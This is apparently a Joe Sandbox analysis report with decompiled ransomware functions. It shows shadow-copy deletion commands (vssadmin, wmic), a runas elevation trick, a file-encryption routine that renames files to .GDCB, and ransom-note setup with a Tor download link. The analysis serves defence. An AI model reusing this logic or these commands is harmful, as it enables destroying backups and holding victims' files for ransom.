Opcode Fuzzy Hash: f2c82dd719d54498d6905cc5e8522a9bd6e643af8361d161577f5d147924823c
Instruction Fuzzy Hash: E641A8B4811358DEEB21CF919998B9EBFF5FB04748F50819ED5086B201C7F60A89CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC43E0 Relevance: 78.8, APIs: 5, Strings: 40, Instructions: 99
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 97%

			E0FBC43E0(void* __eflags) {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				char _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char _v120;
				short _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				char _v152;
				short _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				char _v172;
				short* _v176;
				short* _t51;
				WCHAR* _t59;
				void* _t62;
				signed int _t66;
				void* _t69;

				if(E0FBC3B20(_t62) == 0) {
					_v172 = 0x63005c;
					_v168 = 0x64006d;
					_v8 = 0;
					_t59 =  &_v172;
					_v164 = 0x65002e;
					_t51 =  &_v84;
					_v160 = 0x650078;
					_v156 = 0;
					_v84 = 0x63002f;
					_v80 = 0x760020;
					_v76 = 0x730073;
					_v72 = 0x640061;
					_v68 = 0x69006d;
					_v64 = 0x20006e;
					_v60 = 0x650064;
					_v56 = 0x65006c;
					_v52 = 0x650074;
					_v48 = 0x730020;
					_v44 = 0x610068;
					_v40 = 0x6f0064;
					_v36 = 0x730077;
					_v32 = 0x2f0020;
					_v28 = 0x6c0061;
					_v24 = 0x20006c;
					_v20 = 0x71002f;
					_v16 = 0x690075;
					_v12 = 0x740065;
				} else {
					_v152 = 0x77005c;
					_v148 = 0x650062;
					_t59 =  &_v152;
					_v144 = 0x5c006d;
					_t51 =  &_v120;
					_v140 = 0x6d0077;
					_v136 = 0x630069;
					_v132 = 0x65002e;
					_v128 = 0x650078;
					_v124 = 0;
					_v120 = 0x680073;
					_v116 = 0x640061;
					_v112 = 0x77006f;
					_v108 = 0x6f0063;
					_v104 = 0x790070;
					_v100 = 0x640020;
					_v96 = 0x6c0065;
					_v92 = 0x740065;
					_v88 = 0x65;
				}
				_v176 = _t51;
				_t69 = VirtualAlloc(0, 0x400, 0x3000, 0x40);
				if(_t69 != 0) {
					GetSystemDirectoryW(_t69, 0x100);
					lstrcatW(_t69, _t59);
					ShellExecuteW(0, L"open", _t69, _v176, 0, 0);
					asm("sbb edi, edi");
					_t66 =  ~0x20;
				} else {
					_t66 = 0;
				}
				VirtualFree(_t69, 0, 0x8000);
				return _t66;
			}

APIs

Part of subcall function 0FBC3B20: _memset.LIBCMT ref: 0FBC3B72
Part of subcall function 0FBC3B20: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 0FBC3B96
Part of subcall function 0FBC3B20: VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 0FBC3B9A
Part of subcall function 0FBC3B20: VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 0FBC3B9E
Part of subcall function 0FBC3B20: VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 0FBC3BC5

VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000040), ref: 0FBC459F
GetSystemDirectoryW.KERNEL32(00000000,00000100), ref: 0FBC45B5
lstrcatW.KERNEL32(00000000,0063005C), ref: 0FBC45BD
ShellExecuteW.SHELL32(00000000,open,00000000,?,00000000,00000000), ref: 0FBC45D3
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBC45E7

Strings

, xrefs: 0FBC446B
w, xrefs: 0FBC453B
m, xrefs: 0FBC449C
b, xrefs: 0FBC4406
m, xrefs: 0FBC44E9
m, xrefs: 0FBC4412
\, xrefs: 0FBC4492
, xrefs: 0FBC451A
s, xrefs: 0FBC4443
u, xrefs: 0FBC4572
/, xrefs: 0FBC4567
x, xrefs: 0FBC44BC
s, xrefs: 0FBC44D9
l, xrefs: 0FBC455C
i, xrefs: 0FBC4426
o, xrefs: 0FBC4453
w, xrefs: 0FBC441E
h, xrefs: 0FBC4525
x, xrefs: 0FBC4436
n, xrefs: 0FBC44F1
d, xrefs: 0FBC44F9
e, xrefs: 0FBC447B
p, xrefs: 0FBC4463
open, xrefs: 0FBC45CC
., xrefs: 0FBC44B0
a, xrefs: 0FBC44E1
t, xrefs: 0FBC450F
/, xrefs: 0FBC44C9
\, xrefs: 0FBC43FE
l, xrefs: 0FBC4504
e, xrefs: 0FBC457D
e, xrefs: 0FBC4483
., xrefs: 0FBC442E
a, xrefs: 0FBC4551
e, xrefs: 0FBC4473
d, xrefs: 0FBC4530
, xrefs: 0FBC4546
a, xrefs: 0FBC444B
, xrefs: 0FBC44D1
c, xrefs: 0FBC445B

Memory Dump Source

Source File: 00000019.00000002.311520098.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000019.00000002.311494423.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311529128.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311539070.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311544647.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: ConditionMask$Virtual$AllocDirectoryExecuteFreeInfoShellSystemVerifyVersion_memsetlstrcat
String ID: $ $ $ $.$.$/$/$\$\$a$a$a$b$c$d$d$e$e$e$e$h$i$l$l$m$m$m$n$o$open$p$s$s$t$u$w$w$x$x
API String ID: 2684037697-4098772853
Opcode ID: b6d9442d16634e72325cf9b6e8437ccbd059e91e54eb7d4026becb14cee4bab6
Instruction ID: 975930d2315a9d3e52b5b89b99484713fc959c96d7b31b740db8c1543f7bed46
Opcode Fuzzy Hash: b6d9442d16634e72325cf9b6e8437ccbd059e91e54eb7d4026becb14cee4bab6
Instruction Fuzzy Hash: CC4117B0148380DFE320CF219859B5BBFE6BB85B49F10491CE6985A291C7F6854CCFA7

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC3BE0 Relevance: 77.1, APIs: 9, Strings: 35, Instructions: 109
memorysynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0FBC3BE0(void* __ecx, void* __edx, void* __eflags) {
				char _v1020;
				short _v1028;
				char _v1532;
				short _v1540;
				intOrPtr _v1548;
				intOrPtr _v1552;
				intOrPtr _v1556;
				intOrPtr _v1560;
				intOrPtr _v1564;
				intOrPtr _v1568;
				intOrPtr _v1572;
				intOrPtr _v1576;
				intOrPtr _v1580;
				intOrPtr _v1584;
				intOrPtr _v1588;
				intOrPtr _v1592;
				intOrPtr _v1596;
				intOrPtr _v1600;
				intOrPtr _v1604;
				intOrPtr _v1608;
				intOrPtr _v1612;
				intOrPtr _v1616;
				short _v1620;
				intOrPtr _v1624;
				intOrPtr _v1628;
				intOrPtr _v1632;
				intOrPtr _v1636;
				intOrPtr _v1640;
				intOrPtr _v1644;
				intOrPtr _v1648;
				intOrPtr _v1652;
				intOrPtr _v1656;
				intOrPtr _v1660;
				intOrPtr _v1664;
				intOrPtr _v1668;
				intOrPtr _v1672;
				short _v1676;
				char _v1680;
				int _t54;
				struct HWND__* _t62;
				long _t66;
				void* _t76;
				void* _t78;
				void* _t80;

				_t78 = __ecx;
				_t54 = E0FBC3B20(__edx);
				if(_t54 != 0) {
					_t54 = E0FBC3AA0();
					if(_t54 == 0) {
						_v1676 = 0x770025;
						_v1672 = 0x6e0069;
						_v1668 = 0x690064;
						_v1664 = 0x250072;
						_v1660 = 0x73005c;
						_v1656 = 0x730079;
						_v1652 = 0x650074;
						_v1648 = 0x33006d;
						_v1644 = 0x5c0032;
						_v1640 = 0x620077;
						_v1636 = 0x6d0065;
						_v1632 = 0x77005c;
						_v1628 = 0x69006d;
						_v1624 = 0x63;
						ExpandEnvironmentStringsW( &_v1676,  &_v1540, 0xff);
						_v1620 = 0x720070;
						_v1616 = 0x63006f;
						_v1612 = 0x730065;
						_v1608 = 0x200073;
						_v1604 = 0x610063;
						_v1600 = 0x6c006c;
						_v1596 = 0x630020;
						_v1592 = 0x650072;
						_v1588 = 0x740061;
						_v1584 = 0x200065;
						_v1580 = 0x630022;
						_v1576 = 0x64006d;
						_v1572 = 0x2f0020;
						_v1568 = 0x200063;
						_v1564 = 0x740073;
						_v1560 = 0x720061;
						_v1556 = 0x200074;
						_v1552 = 0x730025;
						_v1548 = 0x22;
						wsprintfW( &_v1028,  &_v1620, _t78);
						_t76 = VirtualAlloc(0, 0x3d, 0x3000, 0x40);
						 *_t76 = 0x3c;
						 *(_t76 + 4) = 0x40;
						_t62 = GetForegroundWindow();
						_t80 = 0;
						 *(_t76 + 8) = _t62;
						_v1680 = 0x750072;
						_v1676 = 0x61006e;
						_v1672 = 0x73;
						 *((intOrPtr*)(_t76 + 0xc)) =  &_v1680;
						 *((intOrPtr*)(_t76 + 0x10)) =  &_v1532;
						 *((intOrPtr*)(_t76 + 0x14)) =  &_v1020;
						 *(_t76 + 0x18) = 0;
						 *(_t76 + 0x1c) = 0;
						 *(_t76 + 0x20) = 0;
						while(1) {
							_t66 = ShellExecuteExW(_t76);
							if(_t66 != 0) {
								break;
							}
							_t80 = _t80 + 1;
							if(_t80 < 0x64) {
								continue;
							}
							_t54 = VirtualFree(_t76, _t66, 0x8000);
							goto L6;
						}
						WaitForSingleObject( *(_t76 + 0x38), 0xffffffff);
						CloseHandle( *(_t76 + 0x38));
						ExitProcess(0);
					}
				}
				L6:
				return _t54;
			}

APIs

Part of subcall function 0FBC3B20: _memset.LIBCMT ref: 0FBC3B72
Part of subcall function 0FBC3B20: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 0FBC3B96
Part of subcall function 0FBC3B20: VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 0FBC3B9A
Part of subcall function 0FBC3B20: VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 0FBC3B9E
Part of subcall function 0FBC3B20: VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 0FBC3BC5

Part of subcall function 0FBC3AA0: AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0FBC3AD0

ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0FBC3C8D
wsprintfW.USER32 ref: 0FBC3D57
VirtualAlloc.KERNEL32(00000000,0000003D,00003000,00000040), ref: 0FBC3D6B
GetForegroundWindow.USER32 ref: 0FBC3D80
ShellExecuteExW.SHELL32(00000000), ref: 0FBC3DE1
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBC3DF4
WaitForSingleObject.KERNEL32(?,000000FF), ref: 0FBC3E06
CloseHandle.KERNEL32(?), ref: 0FBC3E0F
ExitProcess.KERNEL32 ref: 0FBC3E17

Strings

\, xrefs: 0FBC3C75
c, xrefs: 0FBC3C85
y, xrefs: 0FBC3C45
i, xrefs: 0FBC3C24
", xrefs: 0FBC3CF4
", xrefs: 0FBC3D4C
s, xrefs: 0FBC3CB9
o, xrefs: 0FBC3CA8
m, xrefs: 0FBC3C55
, xrefs: 0FBC3D0A
n, xrefs: 0FBC3D9D
m, xrefs: 0FBC3CFF
r, xrefs: 0FBC3C35
%, xrefs: 0FBC3D41
e, xrefs: 0FBC3CB1
l, xrefs: 0FBC3CC9
t, xrefs: 0FBC3C4D
e, xrefs: 0FBC3C6D
a, xrefs: 0FBC3D2B
s, xrefs: 0FBC3D20
e, xrefs: 0FBC3CE9
p, xrefs: 0FBC3C98
%, xrefs: 0FBC3C17
t, xrefs: 0FBC3D36
c, xrefs: 0FBC3D15
\, xrefs: 0FBC3C3D
w, xrefs: 0FBC3C65
a, xrefs: 0FBC3CE1
r, xrefs: 0FBC3D95
, xrefs: 0FBC3CD1
d, xrefs: 0FBC3C2D
s, xrefs: 0FBC3DA5
c, xrefs: 0FBC3CC1
2, xrefs: 0FBC3C5D
r, xrefs: 0FBC3CD9

Memory Dump Source

Source File: 00000019.00000002.311520098.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000019.00000002.311494423.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311529128.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311539070.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311544647.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: ConditionMask$Virtual$AllocAllocateCloseEnvironmentExecuteExitExpandForegroundFreeHandleInfoInitializeObjectProcessShellSingleStringsVerifyVersionWaitWindow_memsetwsprintf
String ID: $ $"$"$%$%$2$\$\$a$a$c$c$c$d$e$e$e$i$l$m$m$n$o$p$r$r$r$s$s$s$t$t$w$y
API String ID: 561366689-3790645798
Opcode ID: 011a6daa14739b71f6c9164bbe10be41eaddf011a18bb2ea7763ae190e2f3257
Instruction ID: 72760152b44f4d54ed76e87077e809987ae8f2f14d0aea91b839e80d65c1d8f6
Opcode Fuzzy Hash: 011a6daa14739b71f6c9164bbe10be41eaddf011a18bb2ea7763ae190e2f3257
Instruction Fuzzy Hash: FD5157B0108344DFE3208F51D448B8BBFE9FF85B59F004A1DE6988A251C7BA9158CFE2

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC35E0 Relevance: 66.8, APIs: 32, Strings: 6, Instructions: 320
memorystringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 78%

			E0FBC35E0(WCHAR* __ecx, void* __edx, void* __eflags) {
				long _v8;
				void* _v12;
				long _v16;
				long _v20;
				void* _v24;
				void* _v28;
				long _v32;
				long _v36;
				void _v40;
				void _v44;
				signed int _v48;
				WCHAR* _v52;
				WCHAR* _v56;
				void* _v60;
				void* _v64;
				void* _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				short _v80;
				int _v84;
				char _v88;
				char _v104;
				char _v108;
				char _v140;
				char _v388;
				void* _t96;
				void* _t97;
				struct HWND__* _t99;
				void* _t101;
				void* _t107;
				long _t124;
				long _t125;
				long _t128;
				WCHAR* _t145;
				void* _t147;
				void* _t149;
				void* _t151;
				WCHAR* _t162;
				void* _t163;
				void* _t164;
				void _t165;
				void* _t166;
				long _t168;
				void* _t173;
				void* _t175;
				void* _t176;
				void* _t177;

				_t145 = __ecx;
				_t166 = __edx;
				_v52 = __ecx;
				SetFileAttributesW(_t145, GetFileAttributesW(__ecx) & 0xfffffffe);
				_v20 = 0;
				_v32 = 0;
				_t151 = _t166;
				E0FBC63D0(_t151, 0, 0,  &_v20,  &_v32);
				_t162 = VirtualAlloc(0, 0x401, 0x3000, 0x40);
				_v80 = 0x47002e;
				_v56 = _t162;
				_v76 = 0x430044;
				_v72 = 0x42;
				lstrcpyW(_t162, _t145);
				lstrcatW(_t162,  &_v80);
				asm("movdqa xmm0, [0xfbd04b0]");
				asm("movdqu [ebp-0x88], xmm0");
				_push(_t151);
				asm("movdqa xmm0, [0xfbd04b0]");
				asm("movdqu [ebp-0x78], xmm0");
				_v108 = 0;
				asm("movdqa xmm0, [0xfbd04b0]");
				asm("movdqu [ebp-0x64], xmm0");
				E0FBC82A0( &_v104, 0x10);
				E0FBC82A0( &_v140, 0x20);
				_t96 = VirtualAlloc(0, 0x800, 0x3000, 4);
				asm("movdqu xmm0, [ebp-0x88]");
				asm("movdqu [ebx], xmm0");
				asm("movdqu xmm0, [ebp-0x78]");
				_v24 = _t96;
				asm("movdqu [ebx+0x10], xmm0");
				_t97 = VirtualAlloc(0, 0x800, 0x3000, 4);
				asm("movdqu xmm0, [ebp-0x64]");
				_t163 = _t97;
				_v60 = _t163;
				asm("movdqu [edi], xmm0");
				_v88 = 0x20;
				_v84 = 0x10;
				_t99 = E0FBC6530(_v20, _v32, _t96,  &_v88, 0x800);
				_t175 = _t173 + 0x18;
				if(_t99 != 0) {
					_t101 = E0FBC6530(_v20, _v32, _t163,  &_v84, 0x800);
					_t176 = _t175 + 0x14;
					if(_t101 != 0) {
						E0FBC83C0( &_v140,  &_v388);
						_t177 = _t176 + 8;
						_t147 = CreateFileW(_v52, 0xc0000000, 1, 0, 3, 0x80, 0);
						_v28 = _t147;
						if(_t147 != 0xffffffff) {
							_t164 = VirtualAlloc(0, 8, 0x3000, 4);
							 *_t164 = 0;
							 *(_t164 + 4) = 0;
							_t107 = VirtualAlloc(0, 0x100001, 0x3000, 4);
							_t168 = 0;
							_v12 = _t107;
							_v36 = 0;
							while(ReadFile(_t147, _t107, 0x100000,  &_v8, 0) != 0) {
								_t124 = _v8;
								if(_t124 != 0) {
									_t149 = 0;
									_v64 = 0;
									_t168 =  <  ? 1 : _t168;
									 *_t164 =  *_t164 + _t124;
									asm("adc [edi+0x4], ebx");
									_t125 = _v8;
									_v48 = _t125;
									if((_t125 & 0x0000000f) != 0) {
										do {
											_t125 = _t125 + 1;
										} while ((_t125 & 0x0000000f) != 0);
										_v8 = _t125;
									}
									_v68 = VirtualAlloc(0, _t125, 0x3000, 4);
									E0FBC89C0(_t126, _v12, _v48);
									_t128 = _v8;
									_t177 = _t177 + 0xc;
									_v40 = _t128;
									if(VirtualAlloc(0, _t128, 0x3000, 4) != 0) {
										E0FBC3500(_v68, _v40,  &_v64,  &_v388,  &_v104, _t129);
										_t149 = _v64;
										_t177 = _t177 + 0x10;
									}
									VirtualFree(_v68, 0, 0x8000);
									SetFilePointer(_v28,  ~_v48, 0, 1);
									if(WriteFile(_v28, _t149, _v8,  &_v16, 0) == 0) {
										_t168 = 1;
										_v36 = 1;
									}
									VirtualFree(_t149, 0, 0x8000);
									_t147 = _v28;
									if(_t168 == 0) {
										_t107 = _v12;
										continue;
									}
								}
								break;
							}
							VirtualFree(_v12, 0, 0x8000);
							if(_v36 == 0) {
								WriteFile(_t147, _v24, 0x100,  &_v16, 0);
								WriteFile(_t147, _v60, 0x100,  &_v16, 0);
								WriteFile(_t147, _t164, 0x10,  &_v16, 0);
							}
							CloseHandle(_t147);
							_v40 =  *_t164;
							VirtualFree(_t164, 0, 0x8000);
							VirtualFree(_v24, 0, 0x8000);
							VirtualFree(_v60, 0, 0x8000);
							if(_v36 == 0) {
								MoveFileW(_v52, _v56);
							}
							_t165 = _v40;
						} else {
							VirtualFree(_t163, 0, 0x8000);
							VirtualFree(_v24, 0, 0x8000);
							asm("xorps xmm0, xmm0");
							asm("movlpd [ebp-0x28], xmm0");
							_t165 = _v44;
						}
					} else {
						GetLastError();
						asm("xorps xmm0, xmm0");
						asm("movlpd [ebp-0x28], xmm0");
						_t165 = _v44;
					}
				} else {
					MessageBoxA(_t99, "Fatal error: rsaenh.dll is not initialized as well", "Fatal error", 0x10);
					asm("xorps xmm0, xmm0");
					asm("movlpd [ebp-0x28], xmm0");
					_t165 = _v44;
				}
				VirtualFree(_v56, 0, 0x8000);
				return _t165;
			}

APIs

GetFileAttributesW.KERNEL32(00000000,00000010,00000000,00000000), ref: 0FBC35F4
SetFileAttributesW.KERNEL32(00000000,00000000), ref: 0FBC35FF
VirtualAlloc.KERNEL32(00000000,00000401,00003000,00000040,00000000,00000000,00000000,?), ref: 0FBC363A
lstrcpyW.KERNEL32 ref: 0FBC3658
lstrcatW.KERNEL32(00000000,0047002E), ref: 0FBC3663

Part of subcall function 0FBC82A0: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0FBC82C0
Part of subcall function 0FBC82A0: VirtualAlloc.KERNEL32(00000000,00000007,00003000,00000040), ref: 0FBC82E8
Part of subcall function 0FBC82A0: GetModuleHandleA.KERNEL32(?), ref: 0FBC833D
Part of subcall function 0FBC82A0: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0FBC834B
Part of subcall function 0FBC82A0: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0FBC835A
Part of subcall function 0FBC82A0: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0FBC837E
Part of subcall function 0FBC82A0: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBC838C

Part of subcall function 0FBC82A0: CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0FBC292B), ref: 0FBC83A0
Part of subcall function 0FBC82A0: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,0FBC292B), ref: 0FBC83AE

VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000004), ref: 0FBC36C6
VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000004), ref: 0FBC36F1

Part of subcall function 0FBC6530: EnterCriticalSection.KERNEL32(0FBD2A48,?,0FBC3724,00000000,00000000,00000000,?,00000800), ref: 0FBC653B
Part of subcall function 0FBC6530: CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,?,0FBC3724,00000000,00000000,00000000), ref: 0FBC655E
Part of subcall function 0FBC6530: GetLastError.KERNEL32(?,0FBC3724,00000000,00000000,00000000), ref: 0FBC6568
Part of subcall function 0FBC6530: CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0FBC3724,00000000,00000000,00000000), ref: 0FBC6584

MessageBoxA.USER32 ref: 0FBC3738
GetLastError.KERNEL32 ref: 0FBC3773
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0FBC39E2

Strings

B, xrefs: 0FBC3651
, xrefs: 0FBC370A
Fatal error, xrefs: 0FBC372D
D, xrefs: 0FBC364A
Fatal error: rsaenh.dll is not initialized as well, xrefs: 0FBC3732
., xrefs: 0FBC363E

Memory Dump Source

Source File: 00000019.00000002.311520098.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000019.00000002.311494423.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311529128.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311539070.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311544647.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: Virtual$ContextCrypt$Alloc$AcquireFree$AttributesErrorFileLastRelease$AddressCriticalEnterHandleLibraryLoadMessageModuleProcSectionlstrcatlstrcpy
String ID: $.$B$D$Fatal error$Fatal error: rsaenh.dll is not initialized as well
API String ID: 1177701972-69869980
Opcode ID: 710df87eb3861dd69b3f253f68f3146ea06752a8fbec7ca9a5330da282897ba7
Instruction ID: 8d98337d6238a1669b38ee7942bdce5e6aa757747ae31ca8682656bd16a25cb6
Opcode Fuzzy Hash: 710df87eb3861dd69b3f253f68f3146ea06752a8fbec7ca9a5330da282897ba7
Instruction Fuzzy Hash: 9BC17D71E40308ABEB119B95DC46FEEBBB8FF08B11F204155F640BB181DBB869558FA4

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC40E0 Relevance: 66.7, APIs: 7, Strings: 31, Instructions: 175
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 49%

			E0FBC40E0(void* __ecx, void* __edx) {
				char _v148;
				char _v152;
				WCHAR* _v156;
				void* _v160;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				char _v236;
				intOrPtr _v240;
				void* _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				char _v280;
				void* _t54;
				void* _t58;
				void* _t60;
				signed int _t61;
				void* _t62;
				WCHAR* _t65;
				signed short _t69;
				signed short* _t70;
				WCHAR* _t77;
				signed int _t82;
				signed int _t83;
				void* _t87;
				void* _t90;
				long _t93;
				WCHAR* _t94;
				signed int _t97;
				void* _t98;
				WCHAR* _t100;
				void* _t102;

				if( *0xfbd2a64 != 0) {
					L24:
					return _t54;
				}
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(0);
				_push(__ecx);
				_push(0);
				E0FBC39F0( &_v148);
				E0FBC7330( &_v236, __edx);
				_t97 = E0FBC7140( &_v236);
				_t93 = 0x42 + _t97 * 2;
				_t58 = VirtualAlloc(0, _t93, 0x3000, 0x40);
				_v244 = _t58;
				if(_t58 == 0 || 0x40 + _t97 * 2 >= _t93) {
					_t98 = 0;
				} else {
					_t98 = _t58;
				}
				E0FBC6F40( &_v152, _t98);
				_t60 = E0FBC8090(_t98, L"ransom_id=");
				_t61 = lstrlenW(L"ransom_id=");
				asm("movdqa xmm1, [0xfbd04a0]");
				_t77 = 0xfbd2000;
				_t87 = 0xa3;
				_t100 = _t60 + _t61 * 2;
				_t62 = 0xa30;
				_v160 = _t100;
				do {
					_t13 =  &(_t77[8]); // 0x44004e
					_t77 = _t13;
					asm("movdqu xmm0, [ecx-0x10]");
					asm("pxor xmm0, xmm1");
					asm("movdqu [ecx-0x10], xmm0");
					_t87 = _t87 - 1;
				} while (_t87 != 0);
				do {
					 *(_t62 + 0xfbd2000) =  *(_t62 + 0xfbd2000) ^ 0x00000005;
					_t62 = _t62 + 1;
				} while (_t62 < 0xa38);
				 *0xfbd2a64 = 0xfbd2000;
				_t94 = E0FBC8090(0xfbd2000, L"{USERID}");
				if(_t94 == 0) {
					L20:
					_v280 = 0x740068;
					_v276 = 0x700074;
					_v272 = 0x3a0073;
					_v268 = 0x2f002f;
					_v264 = 0x770077;
					_v260 = 0x2e0077;
					_v256 = 0x6f0074;
					_v252 = 0x700072;
					_v248 = 0x6f0072;
					_v244 = 0x65006a;
					_v240 = 0x740063;
					_v236 = 0x6f002e;
					_v232 = 0x670072;
					_v228 = 0x64002f;
					_v224 = 0x77006f;
					_v220 = 0x6c006e;
					_v216 = 0x61006f;
					_v212 = 0x2f0064;
					_v208 = 0x6f0064;
					_v204 = 0x6e0077;
					_v200 = 0x6f006c;
					_v196 = 0x640061;
					_v192 = 0x65002d;
					_v188 = 0x730061;
					_v184 = 0x2e0079;
					_v180 = 0x740068;
					_v176 = 0x6c006d;
					_v172 = 0x65002e;
					_v168 = 0x6e;
					if( *0xfbd2a44 == 0) {
						_t65 = VirtualAlloc(0, 0x400, 0x3000, 4);
						 *0xfbd2a44 = _t65;
						if(_t65 != 0) {
							wsprintfW(_t65, L"%s",  &_v280);
						}
					}
					VirtualFree(_v160, 0, 0x8000);
					_t54 = E0FBC7C10( &_v152);
					goto L24;
				}
				while(1) {
					L11:
					lstrcpyW(_t94, _t100);
					_t94[lstrlenW(_t94)] = 0x20;
					_t94 = 0xfbd2000;
					_t69 =  *0xfbd2000; // 0xfeff
					if(_t69 == 0) {
						goto L20;
					}
					_t82 = _t69 & 0x0000ffff;
					_t102 = 0xfbd2000 - L"{USERID}";
					do {
						_t70 = L"{USERID}";
						if(_t82 == 0) {
							goto L19;
						}
						while(1) {
							_t83 =  *_t70 & 0x0000ffff;
							if(_t83 == 0) {
								break;
							}
							_t90 = ( *(_t102 + _t70) & 0x0000ffff) - _t83;
							if(_t90 != 0) {
								L18:
								if( *_t70 == 0) {
									break;
								}
								goto L19;
							}
							_t70 =  &(_t70[1]);
							if( *(_t102 + _t70) != _t90) {
								continue;
							}
							goto L18;
						}
						_t100 = _v156;
						goto L11;
						L19:
						_t20 =  &(_t94[1]); // 0x2d002d
						_t82 =  *_t20 & 0x0000ffff;
						_t94 =  &(_t94[1]);
						_t102 = _t102 + 2;
					} while (_t82 != 0);
					goto L20;
				}
				goto L20;
			}

APIs

Part of subcall function 0FBC39F0: GetProcessHeap.KERNEL32(?,?,0FBC4637,00000000,?,00000000,00000000), ref: 0FBC3A8C

Part of subcall function 0FBC7330: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 0FBC7357
